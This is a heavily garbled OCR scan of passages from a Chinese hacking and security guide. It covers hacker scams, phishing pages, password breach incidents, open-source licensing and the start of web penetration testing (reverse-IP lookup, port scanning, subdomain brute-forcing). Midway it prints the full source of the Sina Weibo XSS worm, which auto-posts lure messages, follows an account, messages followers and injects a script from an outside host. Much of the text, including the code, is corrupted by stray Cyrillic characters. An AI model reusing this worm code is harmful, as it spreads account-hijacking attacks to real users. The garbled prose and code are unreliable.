在 此 ， 笔 者 将 介绍 一 些 识 别 骗子 的 方法 ， 各 位 可 以 作为 参考 ， 或 告诉 喘 边 对 黑客 技术 
поне, фена, EPEAZ 


1. 所 谓 黑 客 


很 多 时 候 ， 骗 子 们 会 在 各 种 社区 、 论 坛 或 是 社交 网 站 上 发 布 类 似 于 “黑客 收 徒 ” 的 信 
恩 ， 往 往 伴随 看 “技术 列表 ”， 如 图 2-1 所 示 。 

这 是 一 种 典型 的 骗术 ， 可 能 那些 人 对 所 列举 的 技术 仅仅 是 知道 名 字 而 已 ， 有 时 打出 的 
“特价 收 徒 ” 则 满 吓 了 一 些 人 信 图 小 利 的 性 格 ， 使 其 上 当 受 骗 。 除 此 之 外 ， 试 想 ， 如 果 这 


НИ n _ 
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个 人 的 技术 真 的 如 此 高 深 ， 为 什么 还 会 为 了 几 十 元 钱 而 到 处 散布 “ 收 徒 信息 ”， 张 口 财 口 
ле “СР” ШУ? 真正 的 技术 大 牛 应 该 是 抓紧 时 间 研究 技术 ， 提升 目 己 。 另外 笔者 想 纠 
正 一 个 普遍 存在 的 认识 错误 : “盗号 ”很 简单 。 试 想 ， 如 果 盗 号 真 的 如 此 简单 ， 那 让 腾 
讯 、 阿 里 巴巴 这 些 大 公司 的 技术 人 员 情 何以 堪 ? 就 算 真 的 有 人 拥有 这 样 的 技术 ， 他 也 不 
会 为 了 一 些 可 舌 的 理由 去 盗 取 别 的 社交 账号 的 。 
对 于 这 种 情况 ， 不 妨 随 意 想 一 种 不 存在 的 “技术 名 称 ”， 询 问 对 方 是 否 掌 握 ， 如 果 
对 方 想 都 没 想 就 衣 定 ， 那 么 将 言 将 不 攻 目 破 。 如 图 2-2 所 示 ， 我 随意 组 合 了 SQL 和 XSS 两 
个 名 词 。 


< КОЖЕ 


© - 
© 


Сї в, ЖЕЛЕ, ве. я 
ви, ЖОО, AYY, тър 
件 ， 都 可 以 的 


camay O 


© 会 的 ， 学 费 200， 包 教 包 会 

е + 
图 2-2 与 骗子 交谈 截图 ( 无 论 你 说 
ПА, 最 终结 果 都 会 是 : 伸手 要 钱 ) 


2. 不 要 随意 运行 不 明 程 序 


有 一 些 骗术 手段 更 加 隐蔽 ， 以 发 送 “ 黑 客 软件 ”为 借口 ， 给 没有 防备 的 新 手 发 送 木 马 
软件 ， 镭 取信 息 ， 甚 至 让 你 的 计算 机 在 无 声 无 轧 中 沦 为 “肉鸡 ”《 受 黑客 远程 控制 的 计算 
ВО). 《关于 木马 ， 在 第 9 章 会 有 更 多 相关 介绍 。) 


3. 不 要 被 看 似 “ 黑 客 ” 的 东西 蒙蔽 


很 多 新 手 对 黑客 感 兴趣 是 因为 “觉得 很 酷 ”， 正 因 如 此 ， 骗子 们 f Еа 用 一 些 很 
酪 的 东西 来 吸引 别人 。 例 如 “匿名 者 ”以 及 “V 子 MOIS We 

仇杀 队 ”《 图 2-2 左 侧 头 像 )》，“ 匿 名 者 ”黑客 团 
队 给 人 留 下 的 印象 就 是 “ 酷 ” 和 “神秘 ”， 见 图 
2-3， 也 难怪 很 多 骗子 打 看 “匿名 者 ”的 由 子 招 播 撞 
а Г. 

还 是 那 句 话 ， 真 正 钻研 技术 的 人 是 不 需要 这 些 表 
面 功夫 的 。 用 社交 网 络 上 夸张 的 头像 等 信息 来 彰显 目 
己 “ 黑 客 ” 喘 份 的 人 ， 大 多 数 是 骗子 或 “娱乐 畴 ” 人 ec 
Е. ЖТ ЖЖ”, РЯ. 2-3 “匿名 者 ”标志 


АА 黑客 与 安全 技术 指南 


4 以 假 乱 真 的 骗术 


一 些 曾经 在 网 络 世 界 中 招摇 撞 骗 的 人 ， 或 因 巧 合 ， 或 因 其 他 原因 ， 搜 集 了 -一些 技术 书 
籍 的 电子 版 本 或 一 些 效果 明显 的 软件 ， 在 “学 徒 ”缴纳 学 费 后 ， 发 送 给 他 们 ， 其 实说 不 定 
他 们 自己 都 看 不 懂 这 些 书 的 内 容 。 


222 黑客 也 有 娱乐 圈 


娱乐 圈 在 我 们 的 社会 不 可 或 缺 ， 但 在 网 络 安全 的 世界 里 ， 这 个 词 就 颇 有 些 砚 刺 意 义 
了 。“ 黑 客 娱乐 圈 ” 本 身 没有 一 个 准确 的 定义 ， 一 般 认 为 : 没有 钻研 技术 的 精神 ， 整 天 考 
虑 如 何 让 目 己 看 起 来 像 黑 客 ， 仅 会 使 用 一 些小 工具 就 沾沾自喜 、 停 济 不 前 的 人 就 是 娱乐 图 
成 员 ; 也 经 常用 来 代 指 以 “黑客 ”为 咕 头 炒作 目 己 的 人 。 

这 样 的 人 往往 在 一 些 QQ 群 里 出 现 ， 这 些 群 一 般 都 有 成 百 上 干 的 群 成 员 ， 并 且 各 个 群 
之 间 的 成 员 有 首相 当 高 的 重合 性 一 一 这 些 混迹 于 各 种 社交 群 的 人 总 会 添加 不 止 一 个 娱乐 
群 。 如 果 读 者 有 一 位 同学 ， 每 天 沉迷 于 谈论 “ 刷 QQ 钻 石 ”“ 网 赚 ” 这 些 东 西 ， 并 乐 此 不 
疫 地 在 上 自己 的 社交 朋友 圈 发 布 “ 收 徒 信息 ”， 那 么 没 错 了 ， 他 九 成 就 属于 笔者 所 说 的 “ 娱 
乐 圈 ”。 他 们 沉浸 在 目 己 浮躁 的 世界 里 ， 并 乐 在 其 中 。 

这 并 不 是 个 例 ， 很 多 刚 进入 这 个 圈子 或 淘 望 进入 这 个 圈子 的 新 手 都 希望 追求 一 些 更 “ 酷 ” 
的 事物 ， 而 不 是 潜心 钻研 技术 。 好 奇 之 心 人 省 有 之 ， 笔 者 没 资格 要 求 他 们 做 什么 ， 但 希望 他 
们 ， 特 别 是 徘徊 在 “娱乐 圈 ” 的 朋友 们 能 看 清 那 些 光 鲜 下 的 不 实 ， 戒 骄 戒 躁 ， 巷 崖 勒 马 。 


2.2.3” 防 沱 钓鱼 网 站 


钓鱼 网 站 的 存在 确实 给 诈骗 活动 提供 了 便利 〈 例 如 ， 恭 喜 您 获得 了 价值 X x x GJ 
XX 奖品 一 类 ) ， 但 在 此 笔者 要 说 的 重点 是 针对 用 户 账 号 、 密 码 的 钓鱼 页 面 。 

随 看 Web 技 术 越 来 越发 达 ， 制 作 钓 鱼 页 面 的 技术 也 随 之 提高 ， 除 去 用 来 诈骗 的 钓鱼 页 
面 ， 还 有 一 种 钓鱼 页 面值 得 人 们 关注 ， 即 黑客 攻击 钓鱼 页 面 。 这 种 类 型 的 钓鱼 页 面 一 般 以 
得 到 目标 用 户 密码 等 隐私 信息 为 目的 ， 伪 造 目 标 用 户 熟 悉 的 Web 环 境 并 实施 攻击 ， 在 6.4 节 
有 一 个 基于 XSS 的 钓鱼 示例 ， 读 者 可 以 提前 看 一 下 。 

为 了 防范 这 种 钓鱼 攻击 ， 最 便捷 可 徘 的 方法 就 是 留意 浏览 器 URL 信 息 。 

注意 : 此 处 仅仅 是 指 浏览 器 显示 的 URL， 而 并 不 是 点 击 链接 时 的 URL 一 一 因为 
URL 可 以 跳 转 ， 比 如 近期 就 有 一 个 蠕虫 在 各 大 社交 网 站 、 朋 友 圈 传播 ， 中 招 的 用 户 都 
会 以 不 同方 式 发 送 一 个 URL: http://paypassport.suning.com/ids/oauth20/authorize?client _ 
1d=suning 0l&response type=code&redirect uri=http://X X X .com&www.qq.com, 

这 个 链接 实则 是 跳 转 到 了 xxx.com， 攻 击 者 又 在 最 后 加 入 了 www.qq.com 进 行 迷惑 ， 受 
害 者 往往 在 无 意 中 就 成 为 了 螨虫 传 播 的 一 个 环节 ， 这 种 方式 也 被 用 于 隐藏 XSS 的 攻击 。 

那么 ， 在 受害 者 没有 意识 地 进入 攻击 者 的 网 站 之 后 ， 下 一 步 攻 击 又 是 如 何 展开 的 呢 ? 
用 户 的 密码 信息 又 是 如 何 神 不 知 鬼 不 觉 地 泄露 的 呢 ? 
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攻击 者 制作 的 登录 页 面 看 起 来 和 真正 的 登录 页 面 无 异 ， 但 这 个 页 面 的 工作 原理 如 下 : 

(1) 受害 者 输入 账号 、 密 码 信息 。 

(2) 提示 密码 错误 ， 后 台 第 一 次 记录 账号 、 密 码 。 

(3) 受害 者 再 次 输入 账号 、 密 码 。 

(4) 提示 密码 正确 ， 并 跳 转 到 受害 者 真正 想 访 问 的 网 站 ， 同 时 后 台 第 二 次 记录 账 
=. Sh. 

(5) 记录 两 次 输入 的 密码 ， 发 送 给 攻击 者 。 

这 样 一 来 ， 抱 有 “我 第 一 次 随便 输入 密码 就 知道 是 不 是 真 的 ”心态 的 防御 方式 彻底 宣 
告 失败 。 

回 到 刚才 的 那 句 话 : “最 便捷 可 靠 的 方式 就 是 留意 浏览 器 上 的 URL 信 息 ”， 伪 装 得 再 
精妙 的 钓鱼 页 面 ，URL 也 有 看 明显 的 不 同 ， 在 登录 时 留意 URL 栏 ， 无 疑 是 一 种 简便 高 效 的 
防御 方式 。 该 方法 不 能 防御 6.4 节 提 到 的 XSS 禾 益 页 和 面 攻击 ， 不 过 无 须 过 于 担心 ， 过 到 这 种 
攻击 的 概率 实在 是 可 以 忽略 。 

还 有 一 点 需要 注意 的 是 ， 有 些 钓鱼 攻击 者 会 用 子 域 名 来 迷惑 用 户 的 眼睛 ， 例 如 : 
www.baidu.com.xxx.com (假设 xxx.com 为 攻击 者 的 网 站 。 ) 

这 就 需要 我 们 睁 大 眼睛 ， 对 于 要 求 输入 密码 的 网 站 多 留心 ， 或 是 观察 浏览 器 提供 的 信 
县 来 发 现 这 些 钓鱼 页 面 〈 一 些 浏 览 器 会 目 动 判断 该 网 站 的 真 伪 ) 。 
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2.3.1 _ CSDN 事件 


2011 年 12 月 21 日 上 午 ， 有 骇 客 在 网 上 披露 CSDN 数 据 库 泄 露 ， 并 提供 了 下 载 地 址 ， 高 
达 600 余 万 个 注册 邮箱 与 密码 泄露 ， 并 且 所 有 密码 都 使 用 明文 储存 。CSDN 是 国内 最 大 的 
以 程序 员 为 核心 的 大 型 网 站 ， 却 采用 明文 储存 用 户 密 码 〈 当 时 即便 是 小 型 BBS 网 站 数据 库 
都 采用 MD5S 等 方式 对 密码 加 密 ) 。 

21 日 晚 ，CSDN 发 布 声 明 并 道 次 。 据 CSDN 官 方 解 释 ， 该 数据 库 为 CSDN 作 为 备份 所 
用 ，CSDN 在 2009 年 4 月 之 前 是 以 明文 保存 密码 ， 而 泄漏 原因 不 详 。 

继 CSDN 的 数据 库 泄漏 之 后 ， 天 涯 社区 、 世 纪 佳 缘 、 开 心 网 等 十 余 家 国内 知名 网 站 的 
近 5000 万 用 户 信 息 陆 续 在 网 上 被 人 公布 ， 各 大 社区 的 信誉 也 遭受 质疑 。 当 然 ， 这 次 严重 的 
事故 同时 也 提高 了 国内 对 网 络 信 息 安全 的 重视 。 


2.3.2 12306 事 件 


2014 年 12 月 25 上 午 ， 乌 云 漏洞 报告 平台 上 出 现 了 一 则 标题 为 “大 量 12306 用 户 数 据 在 
互联 网 站 传 ， 包 插 用 户 账号 、 明 文 密 码 、 身 份 证 号 码 、 邮 箱 等 (泄漏 途径 目前 未 知 ) ” 


АА 黑客 与 安全 技术 指南 


的 新 闻 ， 缺 陷 编 号 为 : WooYun-2014-88532。 这 可 让 网 上 一 下 炸 了 锅 ， 各 种 讨论 与 分 析 瞬 
间 出 炉 ， 根 据 对 泄漏 数据 的 分 析 及 当晚 的 官方 信息 ， 这 次 事件 极 有 可 能 是 一 次 “ 撞 库 攻 
击 ”。 那 么 何谓 “ 撞 库 ”? 就 拿 刚 才 提 到 的 CSDN 数 据 汇 露 来 说 ， 攻 击 者 如 果 用 这 些 泄露 
的 数据 尝试 登录 12306 网 站 ， 或 是 编写 脚本 进行 大 量 登录 测试 ， 就 叫 撞 库 攻击 。 然 而 被 泄 
露 的 数据 远 不 止 CSDN 这 么 多 ， 量 变 引 起 质变 ， 多 米 话 骨牌 效应 导致 了 大 量 数据 的 泄露 。 


2.3.3 “天 河 ” 超 级 计算 机 事件 


2015 年 2 月 12 日 ， 又 一 个 神奇 的 漏洞 引起 了 广泛 关注 ， 这 个 漏洞 竟然 出 现在 超级 计算 
机 天 河 一 号 上 ， 看 实 令 人 震惊 (图 2-4) 。 但 是 仔细 一 看 漏洞 细节 ， 却 又 让 人 啼 突 缘 非 : 
天 河 一 号 的 办 公 环 境 有 一 个 未 加 密 的 无 线 网 络 ， 任 何 设备 都 可 以 轻易 接 入 ， 直 接 进 入 内 
网 。 这 位 日 帽子 小 黑客 顺便 找 了 找 其 他 可 能 存在 的 漏洞 ， 这 一 找 可 不 得 了 ， 他 发 现 天 河 一 
号 超级 计算 机 内 部 存在 大 量 弱 口令 ， 以 及 部 分 服务 器 存在 破 充 漏洞 〈 即 bash 漏 洞 ， 一 个 十 
分 严重 的 Linux 漏 洞 ) 。 
漏洞 概要 


Вайс: WooYun-2015-97005 

漏洞 标题 : 天 河 一 号 超级 计算 机 集群 可 被 登陆 控制 ( 所 有 节点 可 下 发 任务 执行 命令 ， 上 百 账号 泄露 ) F 
相关 厂商 ; 中 国 国家 超级 计算 机 中 心 

漏洞 作者 : zph 

提交 时 间 : 2015-02-12 17:42 


公开 时 间 : 2015-03-29 17:44 
дека: 成 功 的 入 侵 事 件 
CESR: 高 


自 评 Rank : 20 

RARS: 已 交 由 第 三 方 合作 机 构 (cncert 国 家 互联 网 应 急 中 心 ) 处 理 
RAF: http:/ /www.wooyun.org 

Tags 标 签 ; 无 


图 2-4 ”天河 一 号 漏洞 信息 
回顾 以 上 列举 的 3 个 典型 安全 事件 ， 其 部 与 密码 安全 奶奶 相 关 ， 也 正好 对 应 了 密码 安 
全 中 3 个 “过 不 去 的 坎 ”: 明文 存储 、 撞 库 〈 同 一 密码 多 用 〉 和 弱 口 令 。 更 多 关于 密码 安 
全 的 知识 ， 请 见 附 录 。 
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中 招 的 微 博 博 主 会 目 动 通过 广播 和 私信 的 方式 发 布 一 些 诱惑 性 信息 ， 用 户 单 击 链接 后 便 会 
触发 XSS， 发 布 同样 的 信息 并 自动 关注 hellosamy， 中 招 的 用 户 单 击 后 又 会 触发 XSS， 蠕 虫 
便 如 链 式 反应 般 传 播 。 由 于 蠕虫 的 指数 爆炸 型 传播 、 微 博 的 分 享 形 式 以 及 一 些 大 V 认 证 的 
用 户 被 攻击 ， 该 蠕虫 在 16 分 钟 内 就 感染 了 30 000 名 以 上 用 户 ， 可 以 说 是 近 几 年 中 国 SNS 社 
区 受到 的 最 大 的 一 次 攻击 。 

这 次 攻击 并 没有 直接 造成 用 户 的 重大 损失 ， 更 像 是 一 场 黑 客 的 恶作剧 〈 从 收听 的 
hellosamy 用 户 也 能 看 出 ，Samy 是 XSS 蜂 虫 鼻 祖 herosamy 的 作者 ， 他 的 XSS 蠕 虫 曾 造成 社交 
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网 站 MySpace 的 瘫痪 ) 。 但 同样 ， 这 次 事件 也 提高 了 公众 对 信息 安全 的 关注 〈 随 后 新 浪 多 
处 反射 型 XSS 被 披露 ) 。 而 这 次 漏洞 成 因 更 让 人 大 跌眼镜 : 新 浪 对 该 参数 竟然 完全 没有 过 
Е! 这 次 攻击 在 Chrome、Safari 中 会 被 XSS Filter 拦 截 ， 而 IE、Firefox 未 能 和 幸免， 根据 当时 
耻 、Firefox 的 市 场 占有 率 ， 这 的 确 是 一 次 范围 很 广 的 攻击 。 

让 我 们 来 分 析 一 下 这 个 被 用 来 传播 XSS 蜂 虫 的 URL: 


һр: / /четБо .сош/рир/зЕаг/а/хуууй" ><ѕсгірі згс=//мии.2КЕ.сп/1тааез/ 
Е.)5></зсгърЕ>?Гуре-прда е 


在 访问 这 个 URL 时 ， 新 浪 会 对 字符 串 进行 处 理 ， 结 果 变 成 了 访问 : 


ПЕЕРр: //меіро. сот/рир/ѕёаг.рһр?ӯ=хуууа" ><всгіре згс=//мии.2КЕ.сп/ 


1падез/ 5.) з></зсгтрЕ>?Гуре-прдаге 


由 于 参数 g 并 没有 进行 应 有 的 过 滤 ， 导 致 这 个 来 自 外 部 的 J 脚 本 被 通 入 页 面 内 。 


function CreateXHR () | 
return window.XMLHttpRequest? 
new XMLHttpRequest(): 
new Асііуехорјесі+ ("Microsoft .ХМЬНТТР") ; 
) 
function getappkey (url){ 
xmlHttp = createXHR(); 
xmlHttp.open ("GET", url, false); 
xmlHttp.send(); 
result = xmlHttp.responseText; 
іа агг = *'; 
id = result.match (/пашесага=\"Егае\" Е1Е1е=\" [^\"] х/д); 
for (1=0;1<1а.1епдёһ;і++) 4 
sum = 1а[1] .ЪобЪгтпа () -зр114(""") [3]; 
id arr тиште И Ы 
} 
return 19 агг; 
} 
function random msg () { 
link = ' http://163.fm/PxZHoxn?1d=' + new Date () .getTime ();; 
var msgs = | 
' 郭 某 某 事 件 的 一 些 未 注意 到 的 细节 : ', 
' 让 女人 心动 的 100 句 诗歌 : ', 
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'3D 某 团团 高 清 普 通话 版 种 子 :'， 
' 这 是 传说 中 的 神仙 着 但 啊 : ', 
Е АУТ: ', 
' 杨 某 被 爆 多 次 被 潜 规 则 : ', 
' 傻 仔 拿 锤子 去 抢 银行 : "， 
' 可 以 监听 别人 手机 的 软件 : ", 
' 个 税 起 征 点 有 望 提 到 4000: "1; 
маг msg = msgs [Маһ .Поог (Math.random ()*msgs.length)] + link; 
msg = encodeURIComponent (msg) ; 
return msg; 
} 
function post(url,data,sync) { 
xml НЕтр = сгеатехнк () ; 
хи] НЕЕр.ореп ("РО5Т" игі, sync); 
хм! НЕ Ер . зе Ведаез{Неааег ("Ассері", "text/html, арр! 1 саЕтоп/ 
xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); 
xmlHttp.setRequestHeader ("Content-Type","application/x-www-form- 
urlencoded; charset=UTF-8"); 
xmlHttp.send (ааба); 
} 
function publish() í 


/* 

* 发 送 带 有 里 虫 链接 的 广播 传播 自身 
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url = 'http://weibo.com/mblog/publish.php?rnd=' + пем Date() . 


деЕТіпе(); 
дата = "соптепЕ-" + random msg() + '&р1с=&5$у1е19=2 &гефсоае='; 
розі (чг1,даса,(гие); 


Function Ғо11ом()( 


/х 
ХИ пет тозашу 
А 

url = 'http://weibo.com/attention/aj addfollow.php?refer ѕогі=рго 


file&atnīId=profile&rnd=' + new Date() .getTime (); 
data = 'uid=' + 2201270010 + '&Егоши1А=' + $CONFIG.$uid + '&геЕег_ 


sort=profile&atnId=profile'; 
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post (url,data, true); 


} 


function message () | 


/ * 
* В 515] 2 2: @ ТН ЖАБ 
ЗЕ 
url = 'http://weibo.com/' + $СОМЕТС.$и1аА + '/ЁЕо11ом'; 


ids = getappkey (url); 

Ке EE oA aE e а ТІ; 

for (1=0;1<id.length - 1 & i<5;i++){ 

msgurl = 'http://weibo.com/message/addmsg.php?rnd=' + new Date(). 
getTime (); 


msg = random msg () ; 


msg = encodeURIComponent (msg) ; 
user = encodeURIComponent (encodeURIComponent (id[i])); 
data = "'content=' + msg + '&name=' + user + '&retcode='; 


post (msgur1l, data, false); 

} 
} 
function main () { 
Егу( 

publish(); 
} 
catch (е) { } 
Сгу{ 

Го11ом (); 
} 
catch (е) { } 
Еу 
message () ; 

} 
catch (е) || 
} 
Егу( 
х= g=document.createElement ('script');g.src='http://www.2kt.cn/ 
images/t.Js';document.body.appendChild(g)";window.opener.eval (x); 


} 
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catch (е) { } 


Maini: 


var t=setTimeout('location="http://weibo.com/pub/topic";',5000); 


24 开源 理念 


“开源 ” 即 开放 源 代 码 ， 具 有 开源 特性 的 软件 〈 包 括 操 作 系统 ) ， 其 源 代 码 对 所 有 人 
开放 ， 任 何人 均 可 以 修改 、 使 用 、 再 发 行 这 些 软件 。 下 面 让 我 们 来 简单 地 了 解 一 下 开源 。 

相信 大 家 都 听 说 过 GNU 基 金 会 基于 Linus Torvalds 开 发 的 Linux 内 核 创立 的 GNU/Linux 
(也 称 Linux)〉 操作 系统 ， 它 的 许多 发 行 版 本 例如 Debian、Ubuntu、Red Hat 等 均 为 基于 开 
源 内 核 的 再 创作 ， 广 为 程序 员 与 技术 人 员 所 知 。 本 书 中 提 到 的 许多 软件 ， 如 Virtual Box 虚 
拟 机 等 ， 也 是 开源 软件 。 

开源 软件 并 非 如 其 字面 意义 一 般 只 是 简单 地 放出 软件 的 源 代码 。 开 源 软 件 需 要 配备 开 
源 许可 证 ， 不 同 的 开源 软件 通常 会 因 不 同 的 开源 目的 选择 不 同 的 许可 证 ， 例 如 Linux 内 核 
使 用 的 是 GPL 许可 证 ， 而 Android 系 统 使 用 的 是 Apache 许 可 证 。 不 同 的 许可 证 决定 了 大 家 
可 以 如 何 使 用 这 份 代 码 ， 例 如 GPL 许可 证 规定 了 任何 使 用 了 GPL 源码 的 程序 也 必须 用 GPL 
许可 证 开源 。 常 见 的 开源 许可 证 有 GPL、MIT、Apache、MS-PL 等 。 开 源 软件 在 国外 通常 
也 被 称 为 目 由 软件 (Free Software) ， 目 由 软件 的 一 个 关键 特征 就 是 它 的 许可 证 ， 不 使 用 
开源 许可 证 发 布 的 源 代 码 在 美国 法 律 中 依然 被 认定 为 专 有 【作者 享有 完整 知识 产权 ) 软 
件 ， 例 如 微软 发 布 的 Reference Source。 国 内 在 开源 软件 领域 沿 处 于 法 律 讶 区， 也 造成 了 一 
些 大 型 厂商 无 所 顾忌 ， 出 现 了 不 遵守 开 源 协 议 的 现象 。 

开源 代表 看 目 由 、 高 效率 和 共享 。 作 为 程序 员 、 开 发 人 员 的 读者 ， 可 以 使 用 源 代码 
进行 二 次 开发 并 册 发 布 ， 也 可 以 对 原始 开源 项 目 进行 拓展 ， 将 更 改 提交 回 原 始 代码 仓库 ， 
使 开源 软件 的 特性 更 多 、 功 能 更 强大 、 更 易 使 用 ， 同 时 提升 普通 用 户 的 使 用 体验 。 这 些 对 
开源 软件 做 出 贡献 的 开发 者 也 称 为 开源 者 ， 他 们 和 其 他 为 开源 软件 做 出 贡献 的 人 员 《 例 如 
进行 本 地 化 或 参与 测试 的 人 员 ) 组 成 了 开源 社区 。 近 些 年 随 看 互联 网 的 高 速 发展 ， 开 源 在 
国内 也 越 来 越 受 欢迎 ， 各 类 开源 社区 大 量 涌现 ， 许 多 城市 都 有 了 当地 的 LUG (Linux User 
Group/Linux，Linux 用 户 社 组 ) ， 还 有 一 些 类 似 AOSC《〈 安 同 开源 社区 ) 这 样 专 精 于 开发 
目 己 的 开源 软件 /系统 的 社区 。 开 源 与 开发 者 、 使 用 者 是 相得益彰 的 ， 而 它 所 体现 出 的 目 
由 、 共 享 与 探索 精神 ， 则 与 黑客 精神 在 本 质 是 相通 的 。 

我 们 会 在 第 4 章 讲 到 对 开源 CMS (Content Management System) 的 审计 技巧 ，CMS 即 
内 容 管理 系统 ， 随 者 Web 2.0 时 代 的 发 展 ， 越 来 越 多 的 企业 、 个 人 在 使 用 CMS 建设 网 站 。 
由 于 几乎 所 有 CMS 都 开源 ， 所 以 很 多 的 CMS 漏洞 挖掘 实际 上 是 基于 代码 审计 ， 也 就 是 白 
盒 漏 洞 挖 掘 。 在 阅读 代码 审计 章节 前 ， 请 先 锻炼 一 下 目 己 的 代码 阅读 能 力 。 


网 络 安全 现状 浅 析 = 7 Жа 


2% ”攻防 交响 曲 


2.5 Жі 


黑客 的 世界 五 彩 缤纷 ， 但 又 充斥 着 华 而 不 实 的 东西 ， 黑 客 确实 看 起 来 很 酷 ， 但 这 酷 的 
背后 其 实 缠 含 看 十 分 艰 吾 的 学 习 过 程 ， 希 望 一 距 而 就 的 人 往往 会 落 进 不 怀 好 意 者 的 圈套 。 
黑客 与 安全 并 不 是 相对 的 ， 他 〈 它 ) 们 相辅相成 一 一 因为 有 黑客 的 探索 才 会 有 安全 ， 叉 正 
是 因为 无 法 做 到 绝对 安全 ， 黑 客 才 有 存在 的 意义 。 如 条 你 确定 目 己 有 坚持 下 去 的 角力 ， 请 
翻 开 下 一 页 ， 我 们 将 开始 真正 地 讲述 那 看 起 来 神秘 的 “黑客 技术 ”。 


АА 黑客 与 安全 技术 指南 


何谓 Web 渗 透 测 试 〈(Penetration Test) ? 相信 大 家 对 Web 都 不 卫生， 渗透 测试 一 般 是 指 
通过 模拟 黑客 的 恶意 攻击 ， 来 评估 计算 机 网 络 系统 的 安全 性 ， 阁 发 现 系统 存在 漏洞 ， 则 提 
交 渗 透 报 告 给 被 测试 系统 的 拥有 者 ， 并 提供 修复 方案 。 本 章 将 通过 对 Web 应 用 及 服务 器 的 
渗透 测试 ， 市 各 位 详细 了 解 渗 透 测试 的 方法 和 技能 。 

本 章 知识 涉及 的 内 容 较 为 分 做 ， 希 望 谈 者 能 够 掌握 学 习 技巧 ， 务 必 杀 目 动 手 实践 ， 
“ 熟 ” 方 能 生 “ 巧 ”。 


3.1 {л ЕК 


信息 搜集 是 Web 渗 透 的 第 一 步 ， 也 是 至 关 重 要 的 一 步 〈 实 际 上 除了 Web 滩 透 ， 很 多 工 
作 的 第 一 步 都 是 信息 搜集 ) 。 一 次 完整 的 渗透 过 程 是 漫长 的 ， 前 期 信息 搜集 可 以 让 人 们 初 
步 了 解 渗透 目标 ， 而 后 期 信息 搜集 却 往往 是 成 功 的 关键 。 任 何 攻 击 与 防御 之 间 的 较量 ， 都 
是 基于 信息 的 掌控 程度 ， 在 信息 不 对 等 的 情况 下 ， 很 容易 出 现 误 判 或 失误 。 在 安全 行业 团 
队 的 测试 中 ， 信 息 搜 集 被 视 为 “最 重要 ， 最 耗 时 ”的 一 个 步骤 ， 甚 全 有 专门 的 成 员 负 责 信 
恩 的 搜集 与 分 机 。 下 面 我 们 来 了 解 一 些 冲 用 的 信息 搜集 技巧 〈 这 里 使 用 的 词语 是 “信息 搜 
集 ” 而 非 “信息 收集 ”， 是 因为 “ 搜 ” 字 能 更 好 地 体现 出 归纳 整理 的 含义 ， 有 一 定 的 选择 
性 和 方 同 性 〉。 


311 服务 兹 信息 搜集 


1. ЙД 


何谓 劳 站 攻击 ? 就 是 一 个 服务 器 上 有 多 个 Web 站 点 ， 而 我 们 的 渗透 目标 是 其 中 的 一 个 
Web 站 点 ， 当 我 们 无 法 拿 下 目标 站 点 时 ， 则 可 以 尝试 对 服务 右上 的 其 他 站 点 进行 渗透 ， 然 
后 再 通过 跨 目 录 或 提 权 等 方法 拿 下 目标 站 点 。 常 见 的 劳 站 三 询 流 程 如 下 。 

(1) 获得 渗透 目标 的 真实 IP 地 址 。 
(2) 利用 网 站 平台 、 工 具 反 但 IP 地 址 。 


2. 端口 扫描 


一 台 计 算 机 开放 的 端口 和 它 开 放 的 服务 是 对 应 的 ， 而 渗透 测试 人 员 可 以 通过 端口 扫描 
大 致 了 解 目标 开放 了 哪些 服务 ， 如 80 端 口 对 应 了 HTTP 服 务 ，3306 端 口 对 应 了 MySQL 数据 
库 ，1433 端 口 对 应 了 MSSQL 数 据 库 。 通 过 对 开放 端口 的 分 析 ， 我 们 便 可 以 大 致知 道 目 标 
网 站 使 用 了 什么 数据 库 ， 并 可 以 尝试 进行 数据 库 的 爆破 。 此 外 ， 端 口 扫 摘 对 后 台 的 查找 和 
后 期 的 提 权 也 是 至 关 重 要 的 。 那 笛 见 的 端口 扫 摘 方式 又 有 哪些 呢 ? 

(1) 在 线 平台 。 很 多 平台 都 提供 端口 扫描 的 功能 ， 并 且 提 供 稼 见 服务 的 默认 端口 ， 
如 图 3-1 所 示 。 


一 一 一 一 一 


/ 


жонжа 
мпе: 
IP/ 域 各 : Е 18 
工具 简介 
ЖЫТ Н р] ДЕНЕ НЕГА Ге АНИ. 
звапе: 
ЕЕК : 


(1).НТТРИ ИН Е ЕНЕНЕ Г 5 : 80/8080/3128/8081/9080 
(2). Боске Ива ти 95 : 1080 

(3). FTP ( НА ) 协议 代理 服务 露 常 用 端口 号 : 21 

(4). Telnet (远程 登录 ) 协议 代理 服务 器 常用 匡 口 23 


нттрвза, ИАН 135 80 ср ( ЖЗЕхеског НЯ ) ; 

HTTPS ( securely transferring web pages ) ВЕ. ЖАН 13 7144 З3/ср 443/udp : 

Тепе ( 不 安全 的 文本 传送 ) ， 默 兴 闹 口号 为 23/tcp (木马 Tiny Telnet Server 所 开放 的 纺 口 ) : 

ҒТР, АЗГЕ 3421/©ср ( 木马 Doly Trojan. Fore, Invisible FTP、WebEx、WinCrash 和 Blade Runner 所 开放 的 庄 口 ) 
TFTP ( Trivial File Transfer Protocol ) , АВС 69 Лир; 

SSH ( 安全 登录 ) SCP (У). ПЕЕВ. ИИС 55522/©ср: 

SMTP Simple Май Transfer Protocol (E-mail) , 默认 的 诸 口 号 为 25/tcp ( ЖЗАпбдеп. Email Password Sender. НаеБи Соседа. Shtrilitz 
Stealth. WinPC. М/пЅру ТЕТІ): 

POP3 Post Office Protocol (E-mail) ‚ АЛШ 171955 110/ср : 

WebLogic , 803577001: 

WebSphere 应 用 程序 , 默认 的 沪 口 号 为 9080 ; 

WebSphere 管 理工 具 ,默认 的 端口 号 为 9090 ; 

28055, 圭 认 的 坑口 号 为 8080 ; 


图 3-1 在 线 端口 扫 摘 平台 


(2) ІА. 1013938 1.8 103-2077. ш ШИЕ 
Made Ву ШӨЛСЕГ 完成 后 自动 保存 并 退出 。 
* ЕН: 
3.1 22 Web 信 ЕНЕ Ж : 121,25, 80, 135, 139, 1433 


> 开始 вк ША вея 


1. 二 级 域名 图 3-2 ”端口 扫描 工具 


在 对 一 些 大 型 网 站 进行 渗透 测试 时 ， 主 站 很 难 直接 发 现 漏洞 ， 而 子 站 容易 出 现 问题 。 
例如 SQL 注入 ， 往 往 因 为 数据 库 的 配置 不 严谨 ， 寻 致 黑客 可 以 利用 子 站 的 注入 进行 路 库 ， 
或 者 拿 下 子 站 的 服务 器 ， 利 用 内 网 危害 到 主 站 的 安全 。 图 3-3 便 是 用 一 个 Python 的 脚本 来 
对 白 度 的 二 级 域名 爆破 的 结果 。 


